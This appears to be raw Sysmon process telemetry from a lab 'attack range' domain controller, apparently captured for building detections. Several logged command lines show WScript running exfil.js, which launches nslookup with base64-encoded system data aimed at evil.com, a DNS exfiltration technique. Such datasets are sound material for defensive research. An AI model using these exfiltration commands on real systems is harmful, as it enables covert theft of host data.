14:16:18.567{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196912Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.567{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196911Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.567{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B2-629A-F43E-000000005F02}7488C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196910Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.567{2E1864BB-17B2-629A-F23E-000000005F02}72845688C:\Windows\system32\cmd.exe{2E1864BB-17B2-629A-F43E-000000005F02}7488C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196909Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.569{2E1864BB-17B2-629A-F43E-000000005F02}7488C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B2-629A-F23E-000000005F02}7284C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmewa.tmp 2>&1 10341000x8000000000000000196908Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.521{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17B2-629A-F33E-000000005F02}5040C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196907Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.521{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B2-629A-F33E-000000005F02}5040C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196906Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.521{2E1864BB-17B2-629A-F33E-000000005F02}50407376C:\Windows\system32\conhost.exe{2E1864BB-17B2-629A-F23E-000000005F02}7284C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196905Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.504{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B2-629A-F33E-000000005F02}5040C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196904Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.497{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196903Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.497{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196902Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.497{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196901Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.497{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196900Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.495{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B2-629A-F23E-000000005F02}7284C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196899Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.495{2E1864BB-17A1-629A-783D-000000005F02}55527704C:\Windows\System32\WScript.exe{2E1864BB-17B2-629A-F23E-000000005F02}7284C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196898Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.496{2E1864BB-17B2-629A-F23E-000000005F02}7284C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmewa.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000196897Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.492{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nllqhx.tmpMD5=2F8701F387AF2110E32408D0F4A242C3,SHA256=6A2A0ACD9892C9D73119665C3163E4FB9119D009FEA0026931DDF4E05E5C0E6D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000196896Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.488{2E1864BB-17B2-629A-E83E-000000005F02}23801352C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196895Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.416{2E1864BB-17B2-629A-F03E-000000005F02}60924176C:\Windows\system32\conhost.exe{2E1864BB-17B2-629A-F13E-000000005F02}6116C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196894Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.416{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196893Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.416{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196892Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.416{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196891Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.416{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196890Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.416{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B2-629A-F13E-000000005F02}6116C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196889Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.416{2E1864BB-17B2-629A-EF3E-000000005F02}78241692C:\Windows\system32\cmd.exe{2E1864BB-17B2-629A-F13E-000000005F02}6116C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196888Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.421{2E1864BB-17B2-629A-F13E-000000005F02}6116C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Kioqd2luMzJfY29tcHV0ZXJzeXN0ZW0qKio= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B2-629A-EF3E-000000005F02}7824C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Kioqd2luMzJfY29tcHV0ZXJzeXN0ZW0qKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllqhx.tmp 2>&1 10341000x8000000000000000196887Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.369{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17B2-629A-F03E-000000005F02}6092C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196886Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.369{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B2-629A-F03E-000000005F02}6092C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196885Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.369{2E1864BB-17B2-629A-F03E-000000005F02}60924176C:\Windows\system32\conhost.exe{2E1864BB-17B2-629A-EF3E-000000005F02}7824C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196884Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.353{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E13E-6299-1600-000000005F02}1328C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196883Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.353{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E13E-6299-1600-000000005F02}1328C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196882Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 